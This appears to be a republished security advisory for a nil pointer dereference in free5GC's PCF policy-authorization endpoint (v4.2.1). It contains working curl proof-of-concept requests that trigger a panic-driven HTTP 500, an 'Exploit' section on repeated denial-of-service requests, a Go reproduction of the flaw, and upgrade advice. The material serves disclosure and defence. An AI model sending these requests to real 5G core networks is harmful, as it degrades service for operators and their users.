free5GC’s PCF, NULL pointer dereference, CVE-2025-XXXX (Medium)


The vulnerability resides in the PCF's POST `/npcf-policyauthorization/v1/app-sessions` handler. A single authenticated request triggers a panic when `ascReqData.suppFeat` is set to `"1"` (enabling traffic-routing feature negotiation) and a `medComponents` entry provides an `afAppId` but lacks the optional `AfRoutReq` field. The code path then calls `provisioningOfTrafficRoutingInfo(smPolicy, appID, routeReq, …)` with `routeReq == nil` and dereferences `routeReq.RouteToLocs` (and other fields) without a nil check, causing a runtime error: invalid memory address or nil pointer dereference. Gin's recovery middleware converts the panic into an HTTP 500 response. Changing only `suppFeat` from `"0"` to `"1"` flips the same POST shape from a normal `201 Created` into a panic-driven 500. The endpoint requires a valid `npcf-policyauthorization` OAuth2 access token (PR:L). The PCF process is not killed (Gin recovers), so the realized impact is a per-request panic-DoS on the app-session create path. Validated against the PCF container in the official Docker compose lab, source repo tag v4.2.1, PCF endpoint `http://10.100.200.9:8000`, validation date 2026-03-12.

The vulnerable handler path is `postAppSessCtxProcedure` → `medComponents` loop → `appID := medComp.AfAppId; routeReq := medComp.AfRoutReq` (nil when absent) → `provisioningOfTrafficRoutingInfo(smPolicy, appID, routeReq, medComp.FStatus)`. In `provisioningOfTrafficRoutingInfo`, `routeReq.RouteToLocs`, `routeReq.UpPathChgSub`, and `routeReq.AppReloc` are dereferenced directly without a nil check. When `suppFeat` is `"0"` the traffic-routing branch is not entered and the same input shape returns `201 Created`. Code evidence in free5gc/pcf: `NFs/pcf/internal/sbi/api_policyauthorization.go`, `NFs/pcf/internal/sbi/processor/policyauthorization.go` (line 1740). PoC reproduced.
Platform: free5GC PCF
Version: v4.2.1
Vulnerability: Nil pointer dereference
Severity: Medium
Date: 2026-03-12
<h2 style="color: blue;">Prediction: 2026-03-15</h2>
<h2 style="color: blue;">What Undercode Say:</h2>

Obtain valid npcf-policyauthorization token from NRF
curl -sS -X POST 'http://10.100.200.3:8000/oauth2/token' \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data 'grant_type=client_credentials&nfType=NEF&nfInstanceId=b84c4f0a-6010-4972-8480-e44e625b9ee4&targetNfType=PCF&scope=npcf-policyauthorization'
Trigger panic with suppFeat="1", afAppId present, AfRoutReq absent
curl -i -X POST 'http://10.100.200.9:8000/npcf-policyauthorization/v1/app-sessions' \
-H 'Content-Type: application/json' \
-H 'Authorization: Bearer <valid_npcf_policyauthorization_jwt>' \
--data '{"ascReqData":{"suppFeat":"1","notifUri":"http://127.0.0.1:9999/appsess","ueIpv4":"10.60.0.3","dnn":"internet","medComponents":{"1":{"medCompN":1,"afAppId":"app1"}}}}'
Control comparison with suppFeat="0" returns 201 Created
curl -i -X POST 'http://10.100.200.9:8000/npcf-policyauthorization/v1/app-sessions' \
-H 'Content-Type: application/json' \
-H 'Authorization: Bearer <valid_npcf_policyauthorization_jwt>' \
--data '{"ascReqData":{"suppFeat":"0","notifUri":"http://127.0.0.1:9999/appsess","ueIpv4":"10.60.0.3","dnn":"internet","medComponents":{"1":{"medCompN":1,"afAppId":"app1"}}}}'

<h2 style="color: blue;">Exploit:</h2>
Any party holding a valid `npcf-policyauthorization` token can repeatedly send a crafted POST request (with `suppFeat="1"`, `afAppId` present, `AfRoutReq` absent) to `http://10.100.200.9:8000/npcf-policyauthorization/v1/app-sessions`, causing a nil pointer dereference panic, HTTP 500 response, and log spam. Each request degrades availability without killing the PCF process.

Protection from this CVE:

Upgrade to a patched version of free5GC where `provisioningOfTrafficRoutingInfo` includes a nil check for `routeReq` (as in commit 508d70b). Alternatively, apply the fix from upstream pull request free5gc/pcf65.
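The handler path described above and the shape of the fix, as an added Go example that is not free5GC's own code: the OpenAPI types are reduced stand-ins (assumed shapes), the `vulnerable` switch selects between the v4.2.1 direct dereference and a nil check, and the deferred `recover` stands in for Gin's recovery middleware so that the 500/400/201 outcomes can be compared on the request body from the PoC.

```go
package main

import (
	"encoding/json"
	"errors"
)

// Reduced stand-ins for the OpenAPI types (assumed shapes, not free5GC's own); AfRoutReq is nil when the JSON omits it.
type AfRoutingRequirement struct {
	RouteToLocs []struct{ Dnai string } `json:"routeToLocs"`
}
type MediaComponent struct {
	AfAppId   string                `json:"afAppId"`
	AfRoutReq *AfRoutingRequirement `json:"afRoutReq,omitempty"`
}
type AppSessionContextReqData struct {
	SuppFeat      string                    `json:"suppFeat"`
	MedComponents map[string]MediaComponent `json:"medComponents"`
}
// provisioningOfTrafficRoutingInfo reduced to the dereference that matters: vulnerable=true
// dereferences routeReq directly, as v4.2.1 does; vulnerable=false applies the shape of the fix.
func provisioningOfTrafficRoutingInfo(routeReq *AfRoutingRequirement, vulnerable bool) (int, error) {
	if !vulnerable && routeReq == nil {
		return 0, errors.New("afRoutReq is required when traffic routing is provisioned")
	}
	return len(routeReq.RouteToLocs), nil // nil pointer dereference on the vulnerable path
}

// handleAppSessionCreate mirrors the POST handler loop plus Gin's recovery middleware:
// a panic becomes HTTP 500, while the fixed path rejects the bad component with 400.
func handleAppSessionCreate(body []byte, vulnerable bool) (status int) {
	defer func() {
		if r := recover(); r != nil {
			status = 500
		}
	}()
	var req struct{ AscReqData AppSessionContextReqData `json:"ascReqData"` }
	if err := json.Unmarshal(body, &req); err != nil {
		return 400
	}
	if req.AscReqData.SuppFeat == "1" { // traffic-routing branch is entered only when negotiated
		for _, mc := range req.AscReqData.MedComponents {
			if _, err := provisioningOfTrafficRoutingInfo(mc.AfRoutReq, vulnerable); err != nil {
				return 400
			}
		}
	}
	return 201
}
```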

Impact:

Denial of service (DoS) via authenticated requests, limited to per-request degradation; no confidentiality or persistent integrity impact.


Sources:

Reported By: github.com